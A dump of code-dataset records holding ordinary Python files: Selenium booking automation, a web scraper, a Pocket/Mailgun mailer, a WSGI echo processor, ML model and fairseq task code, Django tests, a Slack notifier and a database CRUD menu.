main_page_instant.input_town_area()\r\n\r\n main_page_instant.input_date_check_in()\r\n main_page_instant.input_date_check_out()\r\n\r\n main_page_instant.click_search_btn()\r\n\r\n # -----------------------------------\r\n hotel_sel_page = HotelSelectPage(driver=driver_index)\r\n hotel_sel_page.select_hotel()\r\n\r\n # -----------------------------------\r\n chosen_hotel_page = ChosenHotelPage(driver=driver_index)\r\n print(chosen_hotel_page.get_hotel_name())\r\n chosen_hotel_page.press_reserve_first()\r\n chosen_hotel_page.press_reserve_second()\r\n chosen_hotel_page.press_float_win_btn()\r\n\r\n # -----------------------------------\r\n pay_page = PaymentPage(driver=driver_index)\r\n print(pay_page.get_hotel_name())\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n input()","sub_path":"trevelocity/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"341895130","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef getHTMLText(url):\n try:\n req = requests.get(url,timeout=30)\n req.raise_for_status()\n req.encoding='utf-8'\n return req.text\n except:\n return \"\"\ndef fillUnivList(text):\n allUniv=[]\n #指定BeautifulSoup的解析其html.parser\n soup = BeautifulSoup(html,\"html.parser\")\n trList = soup.find_all('tr')\n for tr in trList:\n ltd = tr.find_all('td')\n if len(ltd)==0:\n continue\n singleUniv=[]\n for td in ltd:\n singleUniv.append(td.string)\n allUniv.append(singleUniv)\n return allUniv\n\ndef printUnivList(num,ulist):\n print(\"{1:{0}^4}{2:{0}^10}{3:{0}^5}{4:{0}^10}\".format(chr(12288),\"排名\",\"学校名称\",\"省市\",\"总分\"))\n for i in range(num):\n list = ulist[i]\n print(\"{1:{0}^4}{2:{0}^10}{3:{0}^5}{4:{0}^10}\".format(chr(12288),list[0].strip(),list[1].strip(),list[2].strip(),list[3].strip()))\nif __name__ == '__main__':\n url='http://www.zuihaodaxue.com/zuihaodaxuepaiming2019.html'\n html = getHTMLText(url)\n allData=fillUnivList(html)\n # print(len(allData))\n printUnivList(549,allData)","sub_path":"python/Reptile/大学排名/zuihaodaxue.py","file_name":"zuihaodaxue.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"498914043","text":"import requests\nimport json\nimport random\n\n# Select a random number to\n\noffset_randomiser = random.choice(range(100,1000))\n\n# Parameters to get articles from pocket\n\npayload = {\"count\" : \"10\", \"sort\": \"oldest\", \"offset\": {}, \"consumer_key\":\"POCKET CONSUMER KEY\", \"access_token\":\"POCKET ACCESS TOKEN\".format(str(offset_randomiser))}\n\nr = requests.post(\"https://getpocket.com/v3/get\", data = payload)\n\nr_dict = json.loads(r.text)\n\nitems = r_dict['list']\n\nitem_number_list = []\ntitle_links_list = []\n\n# Create a list of article ID numbers as well as a list of tuples with article name and link\n\nfor k, v in items.items():\n item_number_list.append(k)\n title_links_tuple = (v['resolved_title'], v['resolved_url'])\n title_links_list.append(title_links_tuple)\n\n# Create a string with just article names and links\n\nmessage = \"\".join(\"%s\\n %s\\n\" % tup for tup in title_links_list)\n\n# Archive the articles that have been selected using the article ID\n\nfor item in item_number_list:\n r2 = requests.post('https://getpocket.com/v3/send', data={\n 'consumer_key': 'POCKET CONSUMER KEY',\n 'access_token': 'POCKET ACCESS TOKEN',\n 'actions': json.dumps([{\n 'item_id': '{}'.format(item),\n 'action':'archive'\n }])\n })\n\n# Send an email using mailgun with the list of articles\n\ndef send_list():\n\treturn requests.post(\n\t\t\"MAILGUN API ENDPOINT\",\n\t\tauth=(\"api\", \"API KEY\"),\n\t\tdata={\"from\": \"NAME \",\n\t\t\t\"to\": [\"RECEIVING EMAIL ADDRESS\"],\n\t\t\t\"subject\": \"Random pocket articles\",\n\t\t\t\"text\": \"\"\"\n Howdy,\n\n Here's a yummy list of stuff to read:\n\n {}\"\"\".format(message)})\n\nsend_list()\n","sub_path":"pocketdiver.py","file_name":"pocketdiver.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"295519590","text":"\"\"\" wireframe: Minimalistic Web Resource Framework built on Python WSGI.\n\nProcessor for producing an echo response including values from the request.\n\nPer Kraulis\n2011-01-25 split out of response.py\n\"\"\"\n\n\nclass EchoProcessor(object):\n \"Return a response containing the values of the request items.\"\n\n def __init__(self, title='Echo request',\n path_values=True, environ=True, headers=True,\n cookie=True, cgi_fields=True, user=True):\n self.title = title\n self.path_values = path_values\n self.environ = environ\n self.headers = headers\n self.cookie = cookie\n self.cgi_fields = cgi_fields\n self.user = user\n\n def __call__(self, request, response):\n response['Content-Type'] = 'text/plain'\n response.append(\"%s\\n\" % self.title)\n if self.path_values:\n response.append(\"URL path values: %s\\n\" % request.path_values)\n response.append(\"URL path named values: %s\\n\"\n % request.path_named_values.items())\n if self.environ:\n response.append('environ:\\n')\n for item in sorted(request.environ.items()):\n response.append(\" %s = %s\\n\" % item)\n if self.headers:\n response.append('headers:\\n')\n for key in request.headers:\n response.append(\" %s = %s\\n\" % (key, request.headers[key]))\n if self.cookie:\n response.append(\"cookie: %s\\n\" % request.cookie)\n if self.cgi_fields:\n response.append(\"CGI fields: %s\\n\" % request.cgi_fields)\n if self.user:\n response.append(\"User: %s\\n\" % request.user)\n response.append(\"Password: %s\\n\" % request.password)\n","sub_path":"echo_processor.py","file_name":"echo_processor.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"533105182","text":"#!/usr/bin/python\n#\nimport sys\nimport numpy as np\n#\nf = open(sys.argv[1], \"r\")\n#\n#SOB_B_A-14-22549G-100-030-550-150.png;0;0.129226;0.004267;0.007883;0.004518;0.175048;0.000307;0.677721;0.001031;\n#\nt = 0\nY = []\nW = []\nZ = []\n#\nfor i in f:\n if(t == 0):\n t += 1\n continue\n else:\n linha = i.split(\";\")\n Y.append(int(linha[1]))\n wtmp = list()\n for j in linha[2:-1]:\n wtmp.append(float(j))\n W.append(wtmp)\n Z.append(linha[0])\n#\nf.close()\n#\n#print(len(Y), len(W), len(Z))\n#\npac_vot = {}\nimg_vot = {}\npac = {}\nimg = {}\n#\ncorrect = 0\ntotal = 0\nfor i in range(len(Y)):\n if(Y[i] == np.argmax(W[i])):\n correct += 1\n total += 1\ne = float(correct)/total\n#\nfor i in range(len(Y)):\n img_name = Z[i].split(\"-\")\n pac_str = img_name[0]+\"-\"+img_name[1]+\"-\"+img_name[2]\n img_str = img_name[0]+\"-\"+img_name[1]+\"-\"+img_name[2]+\"-\"+img_name[3]+\"-\"+img_name[4]\n if(img_str in img):\n a = np.add(img[img_str][1], W[i])\n img[img_str][1] = a\n img[img_str][2][np.argmax(W[i])] += 1\n else:\n a = [0 for j in range(len(W[i]))]\n np_a = np.array(a)\n np.add(np_a, W[i])\n np_b = np.array(a)\n np_b[np.argmax(W[i])] += 1\n # 1 - soma\n # 2 - voto\n img[img_str] = [Y[i], np_a, np_b]\n#\nimg_correto_sum = 0\nimg_correto_vot = 0\nimg_total = 0\nfor i in img:\n #print(i)\n if(img[i][0] == np.argmax(img[i][1])):\n img_correto_sum += 1\n if(img[i][0] == np.argmax(img[i][2])):\n img_correto_vot += 1\n img_total += 1\na = float(img_correto_sum)/img_total\nb = float(img_correto_vot)/img_total\n#\npac = {}\n#\nfor i in img:\n pac_name = i.split(\"-\")\n pac_str = pac_name[0]+\"-\"+pac_name[1]+\"-\"+pac_name[2]\n correto_sum = 0\n correto_vot = 0\n if(img[i][0] == np.argmax(img[i][1])):\n correto_sum = 1\n if(img[i][0] == np.argmax(img[i][2])):\n correto_vot = 1\n\n if(pac_str in pac):\n pac[pac_str][0] += correto_sum\n pac[pac_str][1] += correto_vot\n pac[pac_str][2] += 1\n else:\n pac[pac_str] = [0,0,0]\n pac[pac_str][0] = correto_sum\n pac[pac_str][1] = correto_vot\n pac[pac_str][2] = 1\n#\nmedia_sum = 0\nmedia_vot = 0\n#\nt = 0\n#\nfor i in pac:\n t += 1\n media_sum += float(pac[i][0])/pac[i][2]\n media_vot += float(pac[i][1])/pac[i][2]\n #print(\"{} {} {} {}\".format(i, pac[i][0], pac[i][1], pac[i][2] ))\n#\nc = float(media_sum)/t\nd = float(media_vot)/t\n#\nprint(\"{};{:.4f};{:.4f};{:.4f};{:.4f};{:.4f}\".format(sys.argv[1], e, a, b, c, d))\n\n","sub_path":"process_results_tensorflow.py","file_name":"process_results_tensorflow.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"619306456","text":"import torch\nfrom GMFRecommender import GMF\n\nclass MLP(torch.nn.Module):\n def __init__(self, params):\n super(MLP, self).__init__()\n self.params = params\n self.num_users = params['num_users']\n self.num_items = params['num_items']\n self.latent_dim = params['latent_dim']\n\n self.user_embedding = torch.nn.Embedding(self.num_users, self.latent_dim)\n self.item_embedding = torch.nn.Embedding(self.num_items, self.latent_dim)\n\n self.fc_layers = torch.nn.ModuleList()\n for _, (in_size, out_size) in enumerate(zip(params['layers'][:-1], params['layers'][1:])):\n self.fc_layers.append(torch.nn.Linear(in_size, out_size))\n\n self.relu = torch.nn.ReLU()\n self.affine_output = torch.nn.Linear(params['layers'][-1], 1)\n self.logistic = torch.nn.Sigmoid()\n\n def forward(self, user_indices, item_indices):\n user_vec = self.user_embedding(user_indices)\n item_vec = self.item_embedding(item_indices)\n\n vec = torch.cat([user_vec, item_vec], dim=-1)\n\n for _, layer in enumerate(self.fc_layers):\n vec = layer(vec)\n vec = self.relu(vec)\n vec = torch.nn.Dropout(p=0.5)(vec)\n out = self.affine_output(vec)\n rating = self.logistic(out)\n\n return rating\n\n def load_pretrain(self, dirs):\n params = self.params\n gmf = GMF(params)\n \n state_dict = torch.load(dirs)\n gmf.load_state_dict(state_dict)\n \n self.user_embedding.weight.data = gmf.user_embedding.weight.data\n self.item_embedding.weight.data = gmf.item_embedding.weight.data\n\n\n# mlp = MLPRecommender(params)\n# mlp.load_pretrain(dirs)","sub_path":"src/model/MLPRecommender.py","file_name":"MLPRecommender.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"56675094","text":"'''\r\nCreated on 20 ene. 2018\r\n\r\n@author: Carlos Vega Gonzalez\r\n'''\r\n\r\nimport psycopg2\r\nimport psycopg2.extras\r\nimport sys\r\nimport pprint\r\n\r\n\r\n\r\ndef menu():\r\n \r\n print (\"Selecciona una opción\")\r\n print (\"\\t1 - Dar de alta un cliente\")\r\n print (\"\\t2 - Dar de baja\")\r\n print (\"\\t3 - Mostrar los datos personales\")\r\n print (\"\\t4 - Matricular a un cliente en un deporte\")\r\n print (\"\\t5 - Desmatricular a un cliente en un deporte\")\r\n print (\"\\t6 - Mostrar los deportes de un cliente\")\r\n print (\"\\t7 - Salir\") \r\n\r\ndef alta():\r\n \r\n cur.execute(\"INSERT INTO Polideportivo (nombre, direccion, dni, telefono) VALUES (%s, %s, %s, %s)\",(n, d, f, t))\r\n \r\n \r\nprint()\r\nprint(\"BIENVENIDOS A PYTHON Y A LA BASE DE DATOS POSTGRESQL\")\r\nprint()\r\nconx = None\r\n\r\nprint(\"Conexión a la Base de Datos Polideportivo\")\r\n\r\ntry:\r\n # Se realiza la conexión con la base de datos postgres\r\n conx = psycopg2.connect(\"dbname=Polideportivo user=postgres password=root\")\r\n print(\"Estableciendo conexión con la base de datos ...\")\r\n #conx.cursor devuelve un objeto cursor necesario para realizar las consultas SQL\r\n cur = conx.cursor()\r\n print (\"Conectado!\\n\")\r\nexcept:\r\n print (\"No se puede conectar con la Base de Datos\")\r\ncur.execute(\"DROP TABLE IF EXISTS Clientes\")\r\nprint(\"La tabla clientes se ha eliminado\")\r\ncur.execute(\"DROP TABLE IF EXISTS Deportes\")\r\nprint(\"La tabla deportes se ha eliminado\")\r\ncur.execute(\"DROP TABLE IF EXISTS Matricula\")\r\nprint(\"La tabla matricula se ha eliminado\")\r\ncur.execute(\"CREATE TABLE Clientes (id serial PRIMARY KEY, nombre varchar, direccion varchar, dni varchar, telefono integer)\")\r\ncur.execute(\"CREATE TABLE Deportes (id serial PRIMARY KEY, deporte varchar, precio_hora varchar)\")\r\ncur.execute(\"CREATE TABLE Matricula (id serial PRIMARY KEY, nombre varchar, deporte varchar)\")\r\n\r\nwhile True:\r\n menu()\r\n \r\n \r\n opcionMenu = input(\"Seleccione una opción: \")\r\n \r\n if opcionMenu == \"1\":\r\n alta()\r\n input(\"Pulse enter para continuar.\")\r\n n = input(\"Introduzca su nombre: \")\r\n d = input(\"Introduzca su dni: \")\r\n f = input(\"Introduzca fecha de nacimiento: \")\r\n t = input(\"Introduzca su numero de teléfono: \")\r\n\r\n elif opcionMenu == \"2\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"3\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"4\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"5\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"6\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"7\":\r\n print(\"Saliendo....\")\r\n break\r\n else:\r\n input(\"No has pulsado ninguna opción correcta...\\npulsa una tecla para continuar\")","sub_path":"Apuntes/AccesoDatos.py","file_name":"AccesoDatos.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"28270769","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport os\nimport torch\nimport logging\nimport itertools\nimport numpy as np\n\nfrom fairseq.data import GenerationMultiPairDataset \nfrom fairseq import options, utils\n\nfrom .translation import TranslationTask\nfrom . import register_task\n\nfrom fairseq.data import (\n AppendTokenDataset,\n ConcatDataset,\n SortDataset,\n data_utils,\n encoders,\n indexed_dataset,\n ResamplingDataset,\n LanguagePairDataset,\n PrependTokenDataset,\n StripTokenDataset,\n TruncateDataset,\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef load_generation_pair_dataset(\n data_path, split,\n tgt,\n src_dict,\n tgt_dict,\n combine, dataset_impl, upsample_primary,\n left_pad_source, left_pad_target, max_source_positions,\n max_target_positions, prepend_bos=False, load_alignments=False,\n truncate_source=False, append_source_id=False, common_eos=None,\n lg_id=None\n):\n\n def split_exists(split, src, tgt, lang, data_path):\n filename = os.path.join(data_path, '{}.{}-{}.{}'.format(split, src, tgt, lang))\n return indexed_dataset.dataset_exists(filename, impl=dataset_impl)\n\n src_datasets = []\n tgt_datasets = []\n\n for k in itertools.count():\n split_k = split + (str(k) if k > 0 else '')\n\n # infer langcode\n if split_exists(split_k, \"src\", \"tgt\", \"src\", data_path):\n prefix = os.path.join(data_path, '{}.{}-{}.'.format(split_k, \"src\", \"tgt\"))\n elif split_exists(split_k, \"tgt\", \"src\", \"src\", data_path):\n prefix = os.path.join(data_path, '{}.{}-{}.'.format(split_k, \"tgt\", \"src\"))\n else:\n if k > 0:\n break\n else:\n raise FileNotFoundError('Dataset not found: {} ({})'.format(split, data_path))\n\n src_dataset = data_utils.load_indexed_dataset(prefix + \"src\", src_dict, dataset_impl)\n if truncate_source:\n src_dataset = AppendTokenDataset(\n TruncateDataset(\n StripTokenDataset(src_dataset, src_dict.eos()),\n max_source_positions - 1,\n ),\n src_dict.eos(),\n )\n src_datasets.append(src_dataset)\n\n tgt_dataset = data_utils.load_indexed_dataset(prefix + \"tgt\", tgt_dict, dataset_impl)\n\n if tgt_dataset is not None:\n tgt_datasets.append(tgt_dataset)\n\n logger.info('{} {} {}-{} {} examples'.format(\n data_path, split_k, \"src\", \"tgt\", len(src_datasets[-1])\n ))\n\n if not combine:\n break\n\n assert len(src_datasets) == len(tgt_datasets) or len(tgt_datasets) == 0\n\n if len(src_datasets) == 1:\n src_dataset = src_datasets[0]\n tgt_dataset = tgt_datasets[0] if len(tgt_datasets) > 0 else None\n else:\n sample_ratios = [1] * len(src_datasets)\n sample_ratios[0] = upsample_primary\n src_dataset = ConcatDataset(src_datasets, sample_ratios)\n if len(tgt_datasets) > 0:\n tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)\n else:\n tgt_dataset = None\n\n if prepend_bos:\n assert hasattr(src_dict, \"bos_index\") and hasattr(tgt_dict, \"bos_index\")\n src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())\n if tgt_dataset is not None:\n tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())\n\n eos = None\n if append_source_id:\n if tgt_dataset is not None:\n tgt_dataset = PrependTokenDataset(tgt_dataset, lg_id)\n if common_eos is not None:\n src_dataset = AppendTokenDataset(src_dataset, src_dict.index('[{}]'.format(common_eos)))\n if tgt_dataset is not None:\n tgt_dataset = AppendTokenDataset(tgt_dataset, tgt_dict.index('[{}]'.format(common_eos)))\n eos = tgt_dict.index('[{}]'.format(common_eos))\n\n bos = tgt_dict.index('[{}]'.format(tgt))\n\n align_dataset = None\n if load_alignments:\n align_path = os.path.join(data_path, '{}.align.{}-{}'.format(split, \"src\", \"tgt\"))\n if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):\n align_dataset = data_utils.load_indexed_dataset(align_path, None, dataset_impl)\n\n tgt_dataset_sizes = tgt_dataset.sizes if tgt_dataset is not None else None\n return GenerationMultiPairDataset(\n src_dataset, src_dataset.sizes, src_dict,\n tgt_dataset, tgt_dataset_sizes, tgt_dict,\n left_pad_source=left_pad_source,\n left_pad_target=left_pad_target,\n max_source_positions=max_source_positions,\n max_target_positions=max_target_positions,\n align_dataset=align_dataset, eos=eos, bos=bos \n )\n\n\n@register_task('multilingual_generation_from_bart')\nclass MultilingualGenerationFromBARTTask(TranslationTask):\n \"\"\"\n Translate from source language to target language with a model initialized with a multilingual pretrain.\n\n Args:\n src_dict (~fairseq.data.Dictionary): dictionary for the source language\n tgt_dict (~fairseq.data.Dictionary): dictionary for the target language\n\n .. note::\n\n The translation task is compatible with :mod:`fairseq-train`,\n :mod:`fairseq-generate` and :mod:`fairseq-interactive`.\n\n The translation task provides the following additional command-line\n arguments:\n\n .. argparse::\n :ref: fairseq.tasks.translation_parser\n :prog:\n \"\"\"\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add task-specific arguments to the parser.\"\"\"\n # fmt: off\n TranslationTask.add_args(parser)\n parser.add_argument('--langs', required=True, metavar='LANG',\n help='comma-separated list of monolingual language, for example, \"en,de,fr\"'\n 'be careful these langs are what you used for pretraining (the same order),'\n 'not for finetuning.'\n 'you should always add all pretraining language idx during finetuning.')\n parser.add_argument('--multilang-sampling-alpha', type=float, default=0.7,\n help='sub sampling factor')\n parser.add_argument('--common_eos', type=str,\n help='common eos symbol for all languages')\n parser.add_argument('--placeholder', type=int, default=0,\n help='number of placeholder in dictionaries')\n parser.add_argument('--gt-langs', type=str,\n help=\"languages used in generation finetuning, separated wiht -, for example, 'en-fr-de'\")\n\n # fmt: on\n\n def __init__(self, args, src_dict, tgt_dict):\n super().__init__(args, src_dict, tgt_dict)\n self.langs = args.langs.split(',')\n for d in [src_dict, tgt_dict]:\n d.add_symbol('')\n if args.common_eos is not None:\n d.add_symbol('[{}]'.format(args.common_eos))\n for l in self.langs:\n d.add_symbol('[{}]'.format(l))\n for i in range(args.placeholder):\n d.add_symbol('[placeholder_{}]'.format(i))\n\n if args.gt_langs is None:\n self.gt_langs = [args.source_lang]\n else:\n self.gt_langs = args.gt_langs.split('-')\n\n assert len(self.gt_langs) > 0\n for lg in self.gt_langs:\n assert lg in self.langs\n\n @classmethod\n def setup_task(cls, args, **kwargs):\n \"\"\"Setup the task (e.g., load dictionaries).\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n \"\"\"\n args.left_pad_source = options.eval_bool(args.left_pad_source)\n args.left_pad_target = options.eval_bool(args.left_pad_target)\n\n paths = utils.split_paths(args.data)\n assert len(paths) > 0\n # find language pair automatically\n if args.source_lang is None or args.target_lang is None:\n args.source_lang, args.target_lang = data_utils.infer_language_pair(paths[0])\n if args.source_lang is None or args.target_lang is None:\n raise Exception('Could not infer language pair, please provide it explicitly')\n\n # load dictionaries\n src_dict = cls.load_dictionary(os.path.join(paths[0], args.source_lang, 'dict.src.txt'))\n tgt_dict = cls.load_dictionary(os.path.join(paths[0], args.target_lang, 'dict.tgt.txt'))\n assert src_dict.pad() == tgt_dict.pad()\n assert src_dict.eos() == tgt_dict.eos()\n assert src_dict.unk() == tgt_dict.unk()\n logger.info('[{}] dictionary: {} types'.format(args.source_lang, len(src_dict)))\n logger.info('[{}] dictionary: {} types'.format(args.target_lang, len(tgt_dict)))\n\n return cls(args, src_dict, tgt_dict)\n\n def _get_sample_prob(self, dataset_lens):\n \"\"\"\n Get smoothed sampling porbability by languages. This helps low resource\n languages by upsampling them.\n \"\"\"\n prob = dataset_lens / dataset_lens.sum()\n smoothed_prob = prob ** self.args.multilang_sampling_alpha\n smoothed_prob = smoothed_prob / smoothed_prob.sum()\n return smoothed_prob\n\n def load_dataset(self, split, epoch=1, combine=False, **kwargs):\n \"\"\"Load a given dataset split.\n\n Args:\n split (str): name of the split (e.g., train, valid, test)\n \"\"\"\n paths = self.args.data.split(':')\n assert len(paths) > 0\n data_path = paths[(epoch - 1) % len(paths)]\n\n # infer langcode\n \n lg_datasets = []\n for lg in self.gt_langs:\n src, tgt = lg, lg \n bos_id = self.tgt_dict.index('[{}]'.format(lg))\n data_path_lg = os.path.join(data_path, lg)\n dataset = load_generation_pair_dataset(\n data_path_lg, split, tgt, self.src_dict, self.tgt_dict,\n combine=combine, dataset_impl=self.args.dataset_impl,\n upsample_primary=self.args.upsample_primary,\n left_pad_source=self.args.left_pad_source,\n left_pad_target=self.args.left_pad_target,\n max_source_positions=getattr(self.args, 'max_source_positions', 1024),\n max_target_positions=getattr(self.args, 'max_target_positions', 1024),\n load_alignments=self.args.load_alignments,\n prepend_bos=getattr(self.args, 'preprend_bos', False),\n append_source_id=True,\n common_eos=self.args.common_eos,\n lg_id=bos_id\n )\n lg_datasets.append(dataset)\n \n dataset_lengths = np.array([len(d) for d in lg_datasets], dtype=float) \n\n sample_probs = self._get_sample_prob(dataset_lengths)\n logger.info(\"| Sample probability by language: \", {\n lang: \"{0:.4f}\".format(sample_probs[id])\n for id, lang in enumerate(self.gt_langs)\n }\n )\n size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths\n logger.info(\"| Up/Down Sampling ratio by language: \", {\n lang: \"{0:.2f}\".format(size_ratio[id])\n for id, lang in enumerate(self.gt_langs)\n }\n )\n if split == getattr(self.args, \"train_subset\", \"train\"):\n resampled_lang_datasets = [\n ResamplingDataset(\n lg_datasets[i],\n size_ratio=size_ratio[i],\n seed=self.args.seed,\n epoch=epoch,\n replace=size_ratio[i] >= 1.0,\n )\n for i, d in enumerate(lg_datasets)\n ]\n dataset = ConcatDataset(\n resampled_lang_datasets,\n )\n else:\n dataset = ConcatDataset(lg_datasets)\n lang_splits = [split]\n for lang_id, lang_dataset in enumerate(lg_datasets):\n split_name = split + '_' + self.gt_langs[lang_id]\n lang_splits.append(split_name)\n self.datasets[split_name] = lang_dataset\n \n if hasattr(self.args, \"valid_subset\"):\n if split in self.args.valid_subset:\n self.args.valid_subset = self.args.valid_subset.replace(\n split, ','.join(lang_splits)\n )\n\n with data_utils.numpy_seed(self.args.seed + epoch):\n shuffle = np.random.permutation(len(dataset))\n self.datasets[split] = SortDataset(\n dataset,\n sort_order=[\n shuffle,\n dataset.sizes,\n ],\n ) \n\n def inference_step(self, generator, models, sample, prefix_tokens=None):\n with torch.no_grad():\n bos_token = self.tgt_dict.index('[{}]'.format(self.args.target_lang))\n return generator.generate(models, sample, prefix_tokens=prefix_tokens, bos_token=bos_token)\n\n def build_generator(self, models, args):\n tgt_lang = self.args.target_lang if self.args.common_eos is None else self.args.common_eos\n if getattr(args, 'score_reference', False):\n from fairseq.sequence_scorer import SequenceScorer\n return SequenceScorer(\n self.target_dictionary,\n eos=self.tgt_dict.index('[{}]'.format(tgt_lang))\n )\n else:\n from fairseq.sequence_generator import SequenceGenerator\n return SequenceGenerator(\n models,\n self.target_dictionary,\n beam_size=getattr(args, 'beam', 5),\n max_len_a=getattr(args, 'max_len_a', 0),\n max_len_b=getattr(args, 'max_len_b', 200),\n min_len=getattr(args, 'min_len', 1),\n normalize_scores=(not getattr(args, 'unnormalized', False)),\n len_penalty=getattr(args, 'lenpen', 1),\n unk_penalty=getattr(args, 'unkpen', 0),\n temperature=getattr(args, 'temperature', 1.),\n match_source_len=getattr(args, 'match_source_len', False),\n no_repeat_ngram_size=getattr(args, 'no_repeat_ngram_size', 0),\n eos=self.tgt_dict.index('[{}]'.format(tgt_lang))\n )\n\n def build_dataset_for_inference(self, src_tokens, src_lengths):\n src_lang = self.args.source_lang if self.args.common_eos is None else self.args.common_eos\n\n src_lang_id = self.source_dictionary.index('[{}]'.format(src_lang))\n source_tokens = []\n for s_t in src_tokens:\n s_t = torch.cat([s_t, s_t.new(1).fill_(src_lang_id)])\n source_tokens.append(s_t)\n dataset = LanguagePairDataset(src_tokens, src_lengths, self.source_dictionary)\n return dataset\n","sub_path":"generation/fairseq/tasks/multilingual_generation_from_bart.py","file_name":"multilingual_generation_from_bart.py","file_ext":"py","file_size_in_byte":14857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"338055513","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom hello.models import LogEntry, Person\n\n\nclass SignalsTest(TestCase):\n def test_post_save_signal(self):\n \"\"\"Tests if signal processor creates db entry when\n making new request, saving new person and editing it\"\"\"\n self.assertEquals(len(LogEntry.objects.all()), 0)\n self.client.get(reverse('hello:home'))\n self.assertEquals(len(LogEntry.objects.all()), 1)\n\n person = Person(name='Foo', last_name='Bar')\n person.save()\n self.assertEquals(len(LogEntry.objects.all()), 2)\n person.name = 'Test'\n person.save()\n self.assertEquals(len(LogEntry.objects.all()), 3)\n\n def test_post_delete_signal(self):\n \"\"\" Tests if signal processor creates db entry when\n deleting some objects and it's action\"\"\"\n person = Person(name='Foo', last_name='Bar')\n person.save()\n\n entry = LogEntry.objects.first()\n self.assertEqual(entry.action, 'created')\n\n person.delete()\n self.assertEquals(len(LogEntry.objects.all()), 2)\n entry = LogEntry.objects.get(pk=2)\n self.assertEqual(entry.action, 'delete')\n\n def test_store_log_entry_when_edited(self):\n \"\"\"Tests if signal processor stores LogEntry field when\n LogEntry model instance is edited\"\"\"\n Person(name='Foo', last_name='Bar').save()\n self.assertEqual(LogEntry.objects.count(), 1)\n\n entry = LogEntry.objects.first()\n entry.action = 'delete'\n entry.save()\n self.assertEqual(LogEntry.objects.count(), 2)\n\n entry = LogEntry.objects.get(model_name='LogEntry')\n self.assertEqual(entry.action, 'edit')\n","sub_path":"apps/hello/tests/test_signals.py","file_name":"test_signals.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"434797332","text":"import logging\nfrom sit.utils.external_notifiers.base import ExternalNotifier\n\nlogger = logging.getLogger(__name__)\n\n\nclass SlackNotifier(ExternalNotifier):\n def __init__(self, hook, title, title_link, content, field_title, field_value, color):\n self.hook = hook\n super(SlackNotifier, self).__init__(title,\n title_link,\n content,\n field_title,\n field_value=field_value,\n color=color)\n self.send()\n\n def send(self):\n logger.info('SlackNotifier - send - building the message ...')\n slack_attachment = dict(pretext='', author_name=self.origin, text=None)\n slack_attachment_field = dict(title=None, value=None, short=False)\n\n field = dict(slack_attachment_field)\n attachment = dict(slack_attachment)\n\n field['title'] = self.field_title\n field['value'] = self.field_value\n\n attachment['fields'] = []\n attachment['fields'].append(field)\n attachment['title'] = self.title\n attachment['title_link'] = self.title_link\n attachment['text'] = '{}'.format(self.content)\n attachment['color'] = self.color\n\n attachments = {\"attachments\": [attachment]}\n\n # send a message\n return self.post_message(attachments)\n","sub_path":"sit/utils/external_notifiers/slack_notifier.py","file_name":"slack_notifier.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"475801504","text":"\"\"\"\r\n Copyright (c) 2016- by Dietmar W Weiss\r\n\r\n This is free software; you can redistribute it and/or modify it\r\n under the terms of the GNU Lesser General Public License as\r\n published by the Free Software Foundation; either version 3.0 of\r\n the License, or (at your option) any later version.\r\n\r\n This software is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\r\n Lesser General Public License for more details.\r\n\r\n You should have received a copy of the GNU Lesser General Public\r\n License along with this software; if not, write to the Free\r\n Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\r\n 02110-1301 USA, or see the FSF site: http://www.fsf.org.\r\n\r\n Version:\r\n\r\n 2018-06-25 DWW\r\n\"\"\"\r\n\r\nimport re\r\n\r\n\r\n\"\"\"\r\n Collection of basic string manipulation functions\r\n\r\n Existing String methods:\r\n s = 'abc dde'\r\n length = len(s) # ==> 7\r\n repetitions = s.count('d') # ==> 2\r\n index = s.index('Dde') # ==> 4\r\n split = s.split('c') # ==> ['ab', ' dde']\r\n reverse = s[::-1] # ==> 'edd cba'\r\n replaced = 